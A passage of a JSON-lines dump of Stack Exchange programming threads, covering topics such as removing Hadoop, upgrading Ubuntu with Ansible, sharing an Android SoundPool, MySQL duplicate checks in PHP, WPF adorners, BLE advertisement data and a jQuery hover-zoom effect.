\n\none pointing to my old Hadoop installation folder\nand the other one pointing to \/usr\/bin\/hadoop.\n\nSo the question is: how to get rid off of Hadoop 1.0.0 completely?\nComment: IMO using packaging\/installers for java stuff is almost always a mistake; the normal downloads give you complete control.\nComment: yeap, but that wasn't the answer to my question was it?\nComment: Nope, which is why it's a comment, and not an answer.\nAnswer: Try using <code>dpkg -r hadoop<\/code>; this should remove the Hadoop package from the system, but leave the config files intact. If you want to lose the config files as well, try <code>dpkg -P hadoop<\/code> instead.\nAnswer: <code>> $HADOOP_HOME\n> \/home\/shiv\/hadoop\n> sudo rm -r \/home\/shiv\/hadoop\n<\/code>\nAnd Hadoop is uninstalled!\nComment: Found extremely useful\nAnswer: I struggled through this for longer than a while and then decided to share it here:\nThe trick is to basically delete all the symlinks pointing back to locations where HDP components reside since that is what causes 80% of the problem. Here is a step by step tutorial for that:\nhttp:\/\/www.yourtechchick.com\/hadoop\/how-to-completely-remove-and-uninstall-hdp-components-hadoop-uninstall-on-linux-system\/\nHope that helps!\nComment: Your page link is broken\n","meta":{"source":"stackoverflow","title":"How to uninstall Hadoop 1.0.0","dup_signals":{}},"subset":"stackexchange"} +{"text":"Ansible cannot be converted to a dict?\n\nQuestion: I have written a playbook to upgrade my OS from 14.04 to 16.04 and i am getting a lot of interactive prompts.\nHere is an example of a prompt :-\n\nHere is my ansible playbook so far :-\n<code>- hosts: os-updates\n gather_facts: yes\n become: yes\n\n tasks:\n - name: Current Distribution\n debug: msg=\"{{ ansible_distribution }}\"\n\n - name: Current Distribution version\n debug: msg=\"{{ ansible_distribution_version}}\"\n\n - name: Comment out old Docker Repo\n command: sed -i '1 s\/^\/#\/' \/etc\/apt\/sources.list.d\/apt_dockerproject_org_repo.list\n\n # Start the update from current os to next OS\n - name: Update apt get repo\n apt: update_cache=yes force_apt_get=yes cache_valid_time=3600\n when: \n - ansible_os_family == \"Debian\"\n - ansible_distribution_version != \"20.04\"\n\n - name: Upgrade all apt packages\n expect:\n command: sudo apt-get upgrade -y\n responses:\n - \"A new version of \/boot\/grub\/menu.lst is available, but the version installed currently has been locally modified. What would you like to do about menu.lst?\": \"keep the local version currently installed\"\n - \"A new version of \/boot\/grub\/menu.lst is available, but the version installed currently has been locally modified. What would you like to do about menu.lst?\": \"keep the local version currently installed\"\n\n - name: Success test\n debug:\n msg: \"{{ }}\" \n<\/code>\nBut i keep running into the following error message :-\n<code>FAILED! => {\"changed\": false, \"msg\": \"argument responses is of type <type 'list'> and we were unable to convert to dict: <type 'list'> cannot be converted to a dict\"}\n<\/code>\nWhat am i doing wrong? Any help will be appreciated. Thank you.\nComment: The `expect` module, either requires a list of answers or a dictionary of `key => question`; `value => answer`, not a list of dictionary, as you are providing it at the moment.\nComment: Have you tried the using `apt` module itself? There is an example which shows how to `Upgrade all packages` (or `dist-upgrade`).\nComment: `What am i doing wrong?` <= As documented on the module page and as clearly reported by your error message, you are passing a list in `responses` where it is expecting a dict.\nComment: @\u03b2.\u03b5\u03b7\u03bf\u03b9\u03c4.\u03b2\u03b5 Awesome. I'll give that a try.\nAnswer: This is what I have used to upgrade from Ubuntu 16.04 to 18.04 to 20.04\n4 files - 2 tasks, 1 handler and a playbook.\nos-upgrade-ubuntu.tsk\nreboot-if-needed.tsk\nreboot-if-needed.hnd\nplaybook.yml\nos-upgrade-ubuntu.tsk\n<code># Use a block to perform tasks conditionally\u2014only if running Ubuntu \n#- debug: msg=\"os-upgrade-ubuntu.tsk {{oldos}} ... {{newos}}\"\n - debug: msg=\"os-upgrade-ubuntu.tsk ... checking for OS Upgrade current version {{ansible_distribution_version}}\"\n\n - name: regather facts to get the latest information \n setup:\n\n - name: Verify DNS resolution\n raw: (echo \"nameserver 184.108.40.206\" | resolvconf -d any && echo \"nameserver 184.108.40.206\" | resolvconf -a any)\n #ignore_errors: true\n\n - block:\n - name: OS Upgrade ... Remove the EOL message of the day if one exists.\n file:\n path: \"{{ item }}\"\n state: absent\n with_items:\n - \/etc\/update-motd.d\/99-esm\n - \/run\/motd.dynamic\n\n - name: OS Upgrade ... Upgrade all packages to the latest version\n apt: update_cache=yes upgrade=full\n\n - name: OS Upgrade ... Ensure update-manager-core is installed.\n apt: name=update-manager-core state=present\n\n - import_tasks: reboot-if-needed.tsk\n\n - name: OS Upgrade ... Run do-release-upgrade non-interactively.\n command: do-release-upgrade -f DistUpgradeViewNonInteractive\n\n - name: regather facts to get the latest information \n setup:\n\n when: ansible_distribution == 'Ubuntu' \n #when: ansible_distribution == 'Ubuntu' and ansible_distribution_version == {{oldos}}\n\n# After the playbook is finished, it's a good idea to confirm all the servers\n# are actually upgraded. Run something like:\n# ansible [group] -a \"lsb_release -a\"\n<\/code>\nreboot-if-needed.tsk\n<code> - name: check if a reboot is required\n shell: \"[ -f \/var\/run\/reboot-required ]\"\n failed_when: false\n register: reboot_required\n changed_when: reboot_required.rc == 0\n notify: \n - reboot\n - wait_for_ready\n\n# make handlers run ... now and not at end of play\n - name: flush handlers\n meta: flush_handlers\n<\/code>\nreboot-if-needed.hnd\n<code> - name: reboot\n reboot:\n reboot_timeout: 1200\n test_command: mount\n\n - name: wait_for_ready\n wait_for:\n host: \"{{ ansible_ssh_host }}\"\n port: 22\n state: started\n connection: local\n become: no\n<\/code>\nplaybook.yml\n<code>---\n- name: Update OS and apply patches\n hosts: all\n gather_facts: yes\n handlers:\n - include: reboot-if-needed.hnd\n tass:\n\n # If system requires a reboot, then reboot\n - import_tasks: reboot-if-needed.tsk\n\n - name: Install Aptitude if needed\n raw: test -e \/usr\/bin\/aptitude || (apt -y update && apt install -y aptitude)\n\n - name: Verify DNS resolution\n raw: (echo \"nameserver 220.127.116.11\" | resolvconf -d any && echo \"nameserver 220.127.116.11\" | resolvconf -a any)\n #ignore_errors: true\n\n - name: Update apt cache\n apt:\n update_cache: yes\n cache_valid_time: 3600\n\n - name: Upgrade all packages to the latest version\n apt:\n name: \"*\"\n state: latest\n - name: Remove dependencies that are no longer required\n apt:\n autoremove: yes\n\n - import_tasks: reboot-if-needed.tsk\n\n - block:\n - set_fact:\n oldos: 16.04\n newos: 18.04\n - import_tasks: reboot-if-needed.tsk\n - import_tasks: os-upgrade-ubuntu.tsk\n - import_tasks: reboot-if-needed.tsk\n when: ansible_distribution == 'Ubuntu' and ansible_distribution_version == '16.04'\n\n - block:\n - set_fact:\n oldos: 18.04\n newos: 20.04\n - import_tasks: reboot-if-needed.tsk\n - import_tasks: os-upgrade-ubuntu.tsk\n - import_tasks: reboot-if-needed.tsk\n when: ansible_distribution == 'Ubuntu' and ansible_distribution_version == '18.04'\n\n # if running Ubuntu 20.04 - no upgrade to be done\n - block:\n - debug:\n msg: 'This server is running Ubuntu 20.04 LTS ... no upgrade will be performed.'\n when: ansible_distribution == 'Ubuntu' and ansible_distribution_version == '20.04'\n - import_tasks: reboot-if-needed.tsk\n<\/code>\n","meta":{"source":"stackoverflow","title":"Ansible cannot be converted to a dict?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Passing soundpool to multiple activities in Android\n\nQuestion: Basically, in a short explanation, I am making a sound board. Once I run the initial activity, it adds all sound clips to the soundpool. I then have two other activities that are to organize the sound clips, and I would like to use the previously loaded soundpool so that there isn't move load time when switching between activities. I am fairly new to this Android coding, so please make things in simple terms!\nEDIT: Also, does anybody know how to stop the playback on a second button click? Not as in clicking a different button, I understand that, but if the same button is clicked, it will stop it?\nMy main activity:\n<code>private SoundManager mSoundManager;<\/code>\n<code>\/** Called when the activity is first created. *\/\n@Override\npublic void onCreate(Bundle savedInstanceState) {\n this.setVolumeControlStream(AudioManager.STREAM_MUSIC);\n super.onCreate(savedInstanceState);\n requestWindowFeature(Window.FEATURE_NO_TITLE);\n getWindow().setFlags(WindowManager.LayoutParams.FLAG_FULLSCREEN,\n WindowManager.LayoutParams.FLAG_FULLSCREEN); \n setContentView(R.layout.main);\n mSoundManager = new SoundManager();\n mSoundManager.initSounds(getBaseContext());\n mSoundManager.addSound(0, R.raw.stop_playing);\n mSoundManager.addSound(1, R.raw.sound1);\n mSoundManager.addSound(2, R.raw.sound2);\n mSoundManager.addSound(3, R.raw.sound3);\n<\/code>\nDealing with soundpool stuff:\n<code>public void initSounds(Context theContext) { \n mContext = theContext;\n mSoundPool = new SoundPool(1, AudioManager.STREAM_MUSIC, 0); \n mSoundPoolMap = new HashMap<Integer, Integer>(); \n mAudioManager = (AudioManager)mContext.getSystemService(Context.AUDIO_SERVICE);\n }<\/code>\n<code>public void addSound(int Index,int SoundID)\n{\n mSoundPoolMap.put(Index, mSoundPool.load(mContext, SoundID, 1));\n\n}\n\npublic void pauseSound(){\n mSoundPool.autoPause();\n}\n\npublic void stopSound(){\n mSoundPool.stop(playingNumber);\n}\n\npublic int playSound(int index) { \n\n int streamVolume = mAudioManager.getStreamVolume(AudioManager.STREAM_MUSIC); \n int soundId = mSoundPool.play(mSoundPoolMap.get(index), streamVolume, streamVolume, 1, 0, 1f);\n mSoundPool.play(mSoundPoolMap.get(index), streamVolume, streamVolume, 1, 0, 1f); \n playingNumber = index;\n return playingNumber;\n}\n<\/code>\n}\nAnswer: Alwade create Application class, and create static SoundManager instance in the your application class, and add needed sounds to SoundManager in the Initial activity. Then you can use current Soundmanager in other activities. Change SoundManager class to static class. \nFor example:\n<code>public class MyApplication extends Application {\n\n public static SoundManager soundManager;\n\n public static SoundManager getSoundManager() {\n return soundManager;\n }\n\n public static void setSoundManager(SoundManager soundManagerIns) {\n soundManager = soundManagerIns;\n }\n\n}\n<\/code>\nand in the initial activity create instance and set it to :\n<code>mSoundManager = new SoundManager();\nmSoundManager.initSounds(getApplicationContext);\nmSoundManager.addSound(0, R.raw.stop_playing);\nmSoundManager.addSound(1, R.raw.choo_choo);\nmSoundManager.addSound(2, R.raw.all);\nmSoundManager.addSound(3, R.raw.hearts);\n\nMyApplication.setSoundManager(mSoundManager);\n<\/code>\nThen you can get this SoundManager in the other activities:\nSoundManager sManager = MyApplication.getSoundManager();\nThis is my example project: SoundPoolExample\nComment: But if were using void for getSoundManager(), how can we return something? I haven't used java in a long time, so I apologize\nComment: Sorry alwade24, I wrote this code in the text of Editor because I scored prostitution look at my post editet.\nComment: Sorry for that late answer your commentary, I'm logged in to stackoverflow now.\nComment: ahhh okay. And not a problem, I may not get around to this until later, I've got a COBOL final in the morning, so I have some studying to do. I'll mark it as answered, but I may have more questions! I appreciate the help!!\nComment: What do you mean when you say \"create instance and set it to\"?\nComment: You need to create at least one instance of the class SoundManager for using.\nComment: And set this intance to soundManager field of MyApplication class (MyApplication.setSoundManager(mSoundManager))\nComment: I then get the message \"The method newInstance(void) is undefined for the type SoundManager\".... Do I want to create that as a method in SoundManager? I apologize, like I said, I haven't had java in a few years, and I don't think we ever dealt with creating instances.... So I'm kinda in the dark, I may not have even done that right\nComment: alwade24 you create SoundManager soundManager = new SoundManager(); and set its to app class: MyApplication.setSoundManager(soundManager);. Send your code to my email.\nComment: See example, i set access to your email, you can download this project: https:\/\/docs.google.com\/file\/d\/0BxNIUTd_m1x8MGlyY2VlNTZERDg\/edit?usp=sharing\n","meta":{"source":"stackoverflow","title":"Passing soundpool to multiple activities in Android","dup_signals":{}},"subset":"stackexchange"} +{"text":"Multilingual Email Greeting\n\nQuestion: CiviCRM for WordPress 4.7.15\nProblem: Fix the Email Greeting, so it takes advantage of the preferred language and gender fields. I took a look at:\nhttps:\/\/wiki.civicrm.org\/confluence\/display\/CRMDOC\/Recipe+for+German+Name+and+Greetings+Handling\nThe page to edit the Email Greeting is hidden under Administration\/System Settings\/Option Groups - Email Type Greeting Options\nI came up with the following which works nicely when used in a Smarty Message Template.\n<code>{capture assign=l}{contact.preferred_language}{\/capture} \n{capture assign=g}{contact.gender}{\/capture} \n{if $l=\"en_CA\"}Dear{else}{if $g=\"Male\"}Cher{else}Ch\u00e8re{\/if}{\/if} {contact.first_name} {contact.last_name}\n<\/code>\nTo test it, one selects the new Email Greeting from the drop down on the Contacts Summary page in the Communication Preferences section. Then clicks Save. At this point, the CiviCRM says.\n\nAny suggestions? I'm considering adding 3 Greetings and updating all 2697 records via SQL. \nComment: In case this is still relevant, make sure that smarty is enabeld as described here: https:\/\/wiki.civicrm.org\/confluence\/display\/CRMDOC\/Smarty+in+mail+templates\nAnswer: I am a bit of a hurry at the moment - we use a greeting based on the prefix - maybe it helps:\n\n{capture assign=c}{contact.communication_style}{\/capture}{capture assign=p}{contact.individual_prefix}{\/capture}{if $p==\"Frau\"}Liebe{else}Lieber{\/if}{ }{if $c==\"Familiar\"}{ }{contact.first_name}{else}{$p}{ }{contact.formal_title}{contact.last_name}{\/if}\nComment: Are you on 4.7.15? Because in my case, using the greeting with capture commands \"crashes\" CiviCRM page. Crashes as in it never finishes reloading the page. In the message context the variables are defined. Maybe they are not in the greeting context. Worth a try.\nComment: I tried just contract.preferred_language and just contact.gender and both resulted in a Network Error.\nComment: I just ried it on the sandbox which is on 4.7.17 - seems to work\nComment: I gave up and did it via SQL\nAnswer: Meanwhile, we have developed a new extension which may help people struggling with many different and or\/complex greetings. The extension (including documentation) can be found here.\n","meta":{"source":"civicrm.stackexchange","title":"Multilingual Email Greeting","dup_signals":{}},"subset":"stackexchange"} +{"text":"bottom up method development parameter passing\n\nQuestion: I develop bottom up, starting with small simple methods to go to the big full fledged implementation\n<code>class Pop(object):\n\n def welcome(self, name, new_member = False):\n response = \"\"\n if new_member:\n response = \" NOT\"\n return str(\"hello there \"+name+\", you seem\"+response+\" to be a member\\n\")\n\n def ageVerification(self, name, age, new_member = False):\n the_welcome_string = self.welcome(name, new_member)\n minimum = \"\"\n excuse = \"\"\n if age < 16:\n minimum = \" NOT\"\n excuse = \", sorry\"\n return str(the_welcome_string+str(age)+\" is\"+minimum+\" the minimum required age to buy beer in Belgium\"+excuse+\"\\n\")\n\n def theWholething(self, name, age, address, new_member = False):\n if age < 16:\n appology = str(\"you cannot order any beer\\n\")\n else:\n appology = str(\"your beer will be shipped to \"+address+\"\\n\")\n return str(self.ageVerification(name, age, new_member)+appology) \n \n# EOF\n<\/code>\nMy question is if it is normal that when i reach theWholeThingMethod, I carry along all the parameters of the previously defined methods? Is this pythonic?\nMy population class has almost 20 \"helper\" methods called in theWholeThing, and it seems I am just fiddling with parameters to get them in the right order ...\n<code>theWholeThing(self,\\\n name,\\\n age,\\\n address,\\\n registered = True,\\\n first_date_entered,\\\n last_date_entered,\\\n purchased_amount,\\\n favorite_beer,\\\n promotional_code,\\\n and_so_on0,\\\n and_so_on1,\\\n and_so_on2,\\\n and_so_on3,\\\n and_so_on4,\\\n and_so_on5,\\\n and_so_on6,\\\n and_so_on7,\\\n and_so_on8,\\\n and_so_on9,\\\n and_so_on10): \n<\/code>\nComment: Where do all these parameters *come from*? Could you accumulate or store the parameters themselves in an object (e.g. a class) - and then just pass the one object around? (Or, store the data on `Pop` directly!)\nComment: A 20-parameter method or function won't be very readable hence not very pythonic.\nAnswer: \nMy question is if it is normal that when i reach theWholeThingMethod, I carry along all the parameters of the previously defined methods? Is this pythonic?\n\nNeither.\nThere is really no point in having a class if all the methods take all the arguments anyway. These might as well just be functions.\nThere are many ways this could be done, depending on whether the various parameters are mandatory, or what happens when one is not provided, but here is one possibility:\n<code>from dataclasses import dataclass\n\n@dataclass\nclass Pop(object):\n\n name: str\n age: int\n address: str\n new_member : bool = False\n\n def welcome(self):\n response = \"\"\n if self.new_member:\n response = \" NOT\"\n return str(\"hello there \"+self.name+\", you seem\"+response+\" to be a member\\n\")\n\n def ageVerification(self):\n the_welcome_string = self.welcome()\n minimum = \"\"\n excuse = \"\"\n if self.age < 16:\n minimum = \" NOT\"\n excuse = \", sorry\"\n return str(the_welcome_string+str(self.age)+\" is\"+minimum+\" the minimum required age to buy beer in Belgium\"+excuse+\"\\n\")\n\n def theWholething(self):\n if self.age < 16:\n appology = str(\"you cannot order any beer\\n\")\n else:\n appology = str(\"your beer will be shipped to \"+self.address+\"\\n\")\n return str(self.ageVerification()+appology) \n \n# EOF\n<\/code>\nNote: @nneonneo had a great suggestion of using a dataclasses, so answer tweaked to incorporate that\nComment: fwiw: it may be more readable to do this as a data class with defaults in the dataclass definition. Then you won't need to do `setattr` magic.\nComment: Great suggestion @nneonneo, thanks. Haven't used them much, so didn't cross my mind, but they seem perfect for this.\nComment: would *args and **kwargs not be better solution than dataclass\nComment: @hewi: Probably a matter of personal opinion. I'd certainly prefer the dataclass over a long list of parameters in the function signature, then all the boiler plate of `self.some_arg = some_arg`\n","meta":{"source":"stackoverflow","title":"bottom up method development parameter passing","dup_signals":{}},"subset":"stackexchange"} +{"text":"Google chrome inspecting media queries colored bars\n\nQuestion: The documentation for Google Chrome Emulator at https:\/\/developer.chrome.com\/devtools\/docs\/device-mode says, \n\n\"To view the media query inspector, click the Media queries media queries icon icon in the upper left corner of the viewport. The DevTools detect media queries in your stylesheets and display them as colored bars in the top ruler.\" \n\nI have clicked on the icon and notice that it is active. However, no colored bars appear anywhere. \nChrome tells me that my version, Version 38.0.2125.122, is up-to-date. The rest of the emulator seems to work OK. The colored bars documented would be REALLY helpful, so I would be extremely grateful if someone could complete or correct Google's instructions. \nWhat would be really terrific is if the emulator could display the file name of the external .css document, as I have a mediaqueries.css document that points (that's the object anyway) to various .css external style sheets. Based on what I'm seeing under the \"Elements\" tab in the \"dock\"? (Google doesn't seem to have a name for the window), it looks like some of the tests, e.g, \"Apple iPhone 3GS\" or \"Apple iPhone 5\", etc., are picking up styles from different style sheets. I didn't know that was possible. \nComment: Wall of text, is hard to read.\nAnswer: I believe this is the area they're talking about. You should see this in emulator mode.\n\nOnce you click the emulator icon, this appears at the top of the browser viewport (not at the bottom where the dev tools are.\n","meta":{"source":"stackoverflow","title":"Google chrome inspecting media queries colored bars","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to call a servlet from a jQuery's $.ajax() function\n\nQuestion: I am trying to call a servlet from jQuery's .ajax() function.\nAt the moment I don't think I am even calling the servlet or passing paramaters to it, however lots of Googling doesn't seem to have helped. Any ideas?\nThis is my html:\n<code><html>\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text\/html; charset=ISO-8859-1\">\n<script type=\"text\/javascript\" src=\"jquery.js\"><\/script>\n<script type=\"text\/javascript\">\nfunction login(){ \n\n $(\"#loading\").hide();\n\n var email = document.nameForm.email.value; \n $.ajax({ \n type: \"GET\", \n url: \"ProcessForm\", \n data: \"email=\"+email, \n success: function(result){ \n alert(result);\n } \n }); \n} \n<\/script>\n<title>My AJAX<\/title>\n<\/head>\n<body>\n<p>This time it's gonna work<\/p>\n<form name=\"nameForm\" id=\"nameForm\" method=\"post\" action=\"javascript:login()\">\n<\/code>\nEmail \n \n \n \n loading\n<code><\/body>\n<\/html>\n<\/code>\nAnd my web.xml\n<code><?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<web-app xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" xmlns=\"http:\/\/java.sun.com\/xml\/ns\/javaee\" xmlns:web=\"http:\/\/java.sun.com\/xml\/ns\/javaee\/web-app_2_5.xsd\" xsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee http:\/\/java.sun.com\/xml\/ns\/javaee\/web-app_2_5.xsd\" id=\"WebApp_ID\" version=\"2.5\">\n <display-name>ajaxtry<\/display-name>\n <welcome-file-list>\n<welcome-file>index.html<\/welcome-file>\n<welcome-file>index.htm<\/welcome-file>\n<welcome-file>index.jsp<\/welcome-file>\n<welcome-file>default.html<\/welcome-file>\n<welcome-file>default.htm<\/welcome-file>\n<welcome-file>default.jsp<\/welcome-file>\n <\/welcome-file-list>\n\n <servlet>\n<servlet-name>ProcessForm<\/servlet-name>\n<servlet-class>com.ajaxtry.web.ProcesFormServlet<\/servlet-class>\n <\/servlet>\n <servlet-mapping>\n<servlet-name>ProcessForm<\/servlet-name>\n<url-pattern>\/ProcessForm<\/url-pattern>\n <\/servlet-mapping>\n<\/web-app>\n<\/code>\nThe servlet is just a template at the moment:\n<code>package com.ajaxtry.web;\n\n\/\/ imports here\n\npublic class ProcessFormServlet {\n\n public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {\n\n response.setContentType(\"text\/html\");\n PrintWriter out = response.getWriter();\n\n System.out.println(request.getParameter(\"email\")); \n }\n}\n<\/code>\nAnswer: A couple of problems here:\nYou're calling System.out.println, which is just sending output to standard out - not to the browser. Try changing \"System.out.println\" to just \"out.println\"\nIt looks like you've defined doPost() in your servlet code, but your javascript is using the \"GET\" method. Rename doPost() to doGet(), or define both of them.\nThat being said, you probably shouldn't bother with the javascript at all until you've actually got the servlet working, to keep it simple. You should be able to test it by loading \/ProcessForm?email=testing in your browser and see some output. Once you get that going, then you can start worrying about the front-end code.\nHope this helps get you started.\nComment: Thanks, I had already done the first two things, the second is a good suggestion, I think that will be the way to go.\nComment: I mean the third, the second is an obvious mistake ;)\n","meta":{"source":"stackoverflow","title":"How to call a servlet from a jQuery's $.ajax() function","dup_signals":{}},"subset":"stackexchange"} +{"text":"PHP: Insert into MySQL database and check if already existing - with binding parameters\n\nQuestion: I am trying to insert test data into a MySQL database using the below lines which works fine so far. \n1) How can I check whether the email already exists in the database and if, echo a message? I saw references here to the use of <code>WHERE EXISTS<\/code> or <code>mysqli_num_rows<\/code> but I am not sure which and how to apply here - in combination with binding parameters.\n2) I came across <code>unset($username, $password, $database);<\/code> to make this query more secure. Is that something that is needed \/ useful here and if, where should I put it ? \nMy PHP: \n<code>$conn = new mysqli($host, $username, $password, $database);\nif($conn->connect_error) {\n die(\"Connection failed: \" . $conn->connect_error);\n}\n\n$stmt = $conn->prepare(\"INSERT INTO cust (email, pw) VALUES (?, ?)\");\n$stmt->bind_param(\"ss\", $email, $hashPw);\n\n$email = \"firstname.lastname@example.com\";\n$pw = \"testpw12345\"; \n$hashPw = password_hash($pw, PASSWORD_DEFAULT); \n$stmt->execute();\n\necho \"Success\";\n\n$stmt->close();\n$conn->close();\n<\/code>\nComment: [How to get the error message in MySQLi?](https:\/\/stackoverflow.com\/a\/22662582\/1839439)\nComment: As for your second question, it would be better to use constants or hardcode the values instead of using variables, which you would then need to unset. Also encapsulation would come in handy here.\nAnswer: An alternative to the solution proposed already. \n<code>$stmt = $conn->prepare(\"SELECT COUNT(1) FROM cust WHERE email = ?\");\n$stmt->bind_param(\"s\", $email);\n$stmt->execute();\n$emailExists = $stmt->get_result()->fetch_row()[0];\nif ($emailExists) {\n echo \"This email address is already in use\";\n} else {\n \/\/ continue with insert code\n}\n<\/code>\nThis approach does not require you to close the statement. Once you execute <code>get_result<\/code> the statement data is fetched in full.\nThis solution also has a potential performance benefit. If your table contains many columns with many data, then fetching that data just to check if a record exists is a waste of CPU. Simply fetch <code>COUNT(1)<\/code> and check the single column of the single returned record. If it is 0, the value is falsish, if it is more than your <code>if<\/code> statement will evaluate to true and a message will be displayed. I would also strongly recommend to structure your code in such a way that you rarely have to use <code>exit<\/code>.\nAnswer: To check if the email already exists in the database, just try to select a row with it in:\n<code>$stmt = $conn->prepare(\"SELECT * FROM cust WHERE email = ?\");\n$stmt->bind_param(\"s\", $email);\n$stmt->execute();\n$stmt->store_result();\nif ($stmt->num_rows > 0) {\n echo \"This email address is already in use\";\n exit;\n}\n$stmt->close();\n\/\/ continue with insert code\n<\/code>\nIn terms of your other questions, I don't see any reason to unset variables, and using prepared queries and <code>password_hash<\/code> gives you about as good protection as you can get.\nComment: @Justin299 sorry, forgot the call to close which you need before preparing another statement. See my edit.\nComment: so now it is correct. however the use of num_rows is still superfluous\nComment: It more an opinion, but this function is useless and doesn't exist in other drivers. I would rather fetch the data selected. it will make calling close() unnecessary.\nComment: @Justin299 did you see my comment about `store_result` and my edit?\nComment: Thanks for this ! I tried to add this but it gives me the following error - do I have to do something like \"unbind\" before I can bind the insert parameters (it seems the error is with that part): \"Fatal error: Uncaught Error: Call to a member function bind_param() on bool in...\"\nComment: @YourCommonSense: Thanks. Can you say what is wrong or missing here ?\nComment: @Justin299 I forgot the call to store_result\nComment: @YourCommonSense why is num_rows superfluous?\nComment: @Nick: Can you say why it is ignoring the count ? I am confused now and not sure what else to change.\nComment: @YourCommonSense fair point. I guess it's 6 of one half a dozen of the other. If you fetch the data you then have to compare the result of whichever `fetch` you use.\nComment: @Justin299 good to hear. I apologise for wasting your time earlier with the bits I left out.\nComment: @Nick: No problem at all - happy it works in the end.\n","meta":{"source":"stackoverflow","title":"PHP: Insert into MySQL database and check if already existing - with binding parameters","dup_signals":{}},"subset":"stackexchange"} +{"text":"Adorner not showing up\n\nQuestion: I am using an UserControl that contains the Canvas. As child of the canvas there is content control with adorner. Why the adorner is not visible perhaps the adorner layer is ceated.\nEverything is created and attached. The adorner layer is very high in a visual tree.\nThe adorner layer is placed outside the UserControl.\nI know that is created because I implemented basic movement mechanism that works but the decorator never shows up.\nWhat has to be done to show the decorator?\nComment: As far as I see from \nhttp:\/\/msdn.microsoft.com\/en-us\/library\/ms743737.aspx the Adorner is usually implemented inside the method override OnRender.\nIs this what your are doing?\nComment: Yes I am. I finally found why. When I added the merged resource dictionary to the MainWindow of the application and not only into resources of the custom usercontrol then the adorner finally show up.\nComment: @patrik i am facing same issue , please explain more...\nComment: I do not know what is you application architecture but I managed to move my entire resource dictionary to the window that contains all object and adorners I managed to resolve the visibility. Previously I had the resources of the adorner assigned to the UserControl. When I moved everything to upper layers (the Window) I got the adorner on the screen.\nAnswer: A WPF window by default has an AdornerDecorator but a usercontrol does not. So you just have to wrap your Canvas with an Adorner decorator in your usercontrol.xaml:\n<code><AdornerDecorator ClipToBounds=\"True\">\n <Canvas x:Name=\"DesignerCanvas\"\n ClipToBounds=\"True\"\n SnapsToDevicePixels=\"True\"\/>\n<\/AdornerDecorator>\n<\/code>\nMore info: https:\/\/social.msdn.microsoft.com\/Forums\/vstudio\/en-US\/43a2565d-df21-4cf3-aa2a-240d67662945\/please-help-me-resolve-a-mistery-with-resource-adorner-and-usercontrol-a-bug?forum=wpf\n","meta":{"source":"stackoverflow","title":"Adorner not showing up","dup_signals":{}},"subset":"stackexchange"} +{"text":"Read manufacture data of ble packet with javascript\n\nQuestion: I am working on a React-native ble project that now requires a Broadcaster (device) observer (client) relationship. \nIs there a high level (JavaScript) way of reading the advertisement packet of ble to obtain the byte array? I am trying to read the entire advertisement packet rather than any format.\nI have use react-native-ble-manager and am looking at react-native-ble-plx by Polidea:\nhttps:\/\/polidea.github.io\/react-native-ble-plx\/#devicemanufacturerdata\nIt looks as if specific fields of the advertisement packet are available under Device: such as manufacture data (the thing I am most interested in and manipulating on the embedded side). However, Most of Polidea examples obtain the Device from a connection.\nI may be misinterpreting the documentation? Could use some advice\/ direction to any further references.\nAnswer: Was misunderstanding the documentation..\n2 minutes of stripping down some complexity revealed what I needed to know.\nAnswer provided for reference of others:\nBleManager's startDeviceScan function(UUIDS, options, listener) where listener is the function where second argument is returned device object. Access its fields from there.\n<code>this.manager.startDeviceScan(null, null, (error, device) => {\n if (error) {\n console.log(error.message);\n return;\n }\n if(device.name === \"Some_encoding_Sensor_1\"){\n console.log(device.manufacturerData);\n }\n<\/code>\nExample shown should filter based off of UUID rather than device.name but that may be easier to work with initially\/dynamically (having multiple devices with renaming scheme).\nAnswer: Take a look on this JS library:\nadvlib\nIt helps with advertising packet decoding and currently supports the following protocols:\n\nBluetooth Low Energy (BLE)\nreelyActive RFID\n","meta":{"source":"stackoverflow","title":"Read manufacture data of ble packet with javascript","dup_signals":{}},"subset":"stackexchange"} +{"text":"jQuery expand element from center not working\n\nQuestion: I am trying to make a zoom-like effect on hover event in a gallery exercise. What I need is for an image to seem to expand from its center, not down and right. If I understood correctly, I need to move it half way left and up for this to work. Also, I'm using <code>em<\/code>, so I try to convert <code>em<\/code> to pixels here.\nRelevant html:\n<code><div id=\"gallery\">\n <img src=\"img\/cool1.gif\">\n <img src=\"img\/cool2.gif\" id=\"gal2\">\n <img src=\"img\/cool3.gif\" id=\"gal3\">\n<\/div>\n<\/code>\nCSS:\n<code>#gallery {\n width: 31em;\n margin-left: auto;\n margin-right: auto;\n}\n\n#gallery img {\n width: 10em;\n height: auto;\n position: absolute;\n}\n\n#gal2 {\n margin-left: 10em;\n}\n\n#gal3 {\n margin-left: 20em;\n}\n<\/code>\nFinally, jQuery:\n<code>var fontSize = $(\"#gallery img\").css(\"font-size\");\/\/equal to 1em?\nvar fontInt = parseInt(fontSize);\n \nvar t = $(\"#gallery img\").position().top;\nvar tNew = t - (5 * fontInt);\/\/top position\n \nvar l = $(\"#gallery img\").position().left;\nvar lNew = l - (5 * fontInt);\/\/left position\n\n$(\"#gallery img\").hover(\n function() {\n \n $(this).stop().css(\"zIndex\", \"1\").animate({\n height : \"20em\",\n width : \"20em\",\n top : tNew,\n left : lNew\n \n }, 400);\n }, \/\/end mouseover\n function() {\n $(this).stop().animate({\n height : \"10em\",\n width : \"10em\",\n top : t,\n left : l,\n zIndex : \"0\"\n }, 400);\n } \/\/end mouseout\n);\/\/end hover\n<\/code>\nedit 1 Images expand and change position, but not as expected. Also, they don't return on mouseout. Thanks to Racil Hilan for solving em-px conversion problem!\nedit 2 Problem moslty solved by fixing variable scope \u2013 position values moved before hover() function. The only remaining bug is that the pictures escape to the top right corner of the body before returning to their place on first interaction. Afterwards, it runs as expected. Also, could somebody explain why this works when the fontInt variable is multiplied by five, not by 10?\nedit 3 \u2013 solution As Mauricio Santamaria said below, just add the css() function setting top and left parameters before hover on #gallery img element like so:\n<code>$(\"#gallery img\").css({\"top\" : t, \"left\" : l}).hover(...);\n<\/code>\nThe rest stays the same.\nI improvised a fiddle for this, too: http:\/\/jsfiddle.net\/dzenesiz\/wudw5hmu\/15\/\nAnswer: The problem is that the 